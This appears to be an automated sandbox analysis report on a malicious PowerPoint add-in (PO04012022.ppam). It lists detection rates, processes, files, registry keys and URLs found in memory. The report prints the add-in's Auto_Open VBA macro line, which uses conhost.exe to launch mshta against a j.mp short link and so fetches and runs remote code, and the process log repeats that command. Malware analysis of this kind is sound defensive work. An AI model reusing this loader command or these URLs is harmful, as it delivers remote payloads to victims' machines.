Source: PO04012022.ppam | Virustotal: Detection: 12% | Perma Link |
Source: PO04012022.ppam | ReversingLabs: Detection: 27% |
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | Process created: C:\Windows\System32\conhost.exe |
Source: conhost.exe, 00000005.00000002.424109476.0000000001B40000.00000002.00020000.sdmp | String found in binary or memory: http://servername/isapibackend.dll |
Source: qwqwae.d | String found in binary or memory: http://www.j.mp/ |
Source: qwqwae.d | String found in binary or memory: http://www.j.mp/asksdkaherereroaasdskd |
Source: qwqwae.d | String found in binary or memory: http://www.j.mp/asksdkahjhhhhtttrrhghghoaasdskd8 |
Source: qwqwae.d | String found in binary or memory: http://www.j.mp/asksdkahjhhhhtttrroaasdskd: |
Source: qwqwae.d | String found in binary or memory: http://www.j.mp/asksdkahjhjhjaoskdoaasdskd |
Source: qwqwae.d | String found in binary or memory: http://www.j.mp/asksdkahjhtytytyhoaasdskd: |
Source: qwqwae.d | String found in binary or memory: http://www.j.mp/asksdkahopopopopdskd |
Source: qwqwae.d | String found in binary or memory: http://www.j.mp/asksdkazxzxzxzxkd |
Source: qwqwae.d | String found in binary or memory: http://www.j.mp/askswewewewzxzxkd |
Source: conhost.exe, 00000005.00000002.424058378.0000000000320000.00000004.00000020.sdmp | String found in binary or memory: http://www.j.mp/askswewewewzxzxkdc: |
Source: VBA code instrumentation | OLE, VBA macro: Module Class1, Function lol, String mshta: Debug.Assert (VBA.Shell("c:\windows\system32\calc\..\conhost.exe c:\windows\system32\calc\..\conhost.exe mshta http://www.j.mp/askswewewewzxzxkd")) | Name: lol |
Source: VBA code instrumentation | OLE, VBA macro: Module Module11, Function Auto_Open | Name: Auto_Open |
Source: PO04012022.ppam | Virustotal: Detection: 12% |
Source: PO04012022.ppam | ReversingLabs: Detection: 27% |
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRE501.tmp | Jump to behavior |
Source: classification engine | Classification label: mal60.expl.winPPAM@7/2@0/0 |
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE "C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE" /AUTOMATION -Embedding | |
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\Desktop\PO04012022.ppam" | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\user\Desktop\PO04012022.ppam | |
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | Process created: C:\Windows\System32\conhost.exe c:\windows\system32\calc\..\conhost.exe c:\windows\system32\calc\..\conhost.exe mshta http://www.j.mp/askswewewewzxzxkd | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\user\Desktop\PO04012022.ppam | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | Process created: C:\Windows\System32\conhost.exe c:\windows\system32\calc\..\conhost.exe c:\windows\system32\calc\..\conhost.exe mshta http://www.j.mp/askswewewewzxzxkd | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | File read: C:\Users\desktop.ini | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\PO04012022.LNK | Jump to behavior |
Source: Window Recorder | Window detected: More than 3 window changes detected |
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\PowerPoint\Resiliency\StartupItems | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\user\Desktop\PO04012022.ppam | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation | Jump to behavior |
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.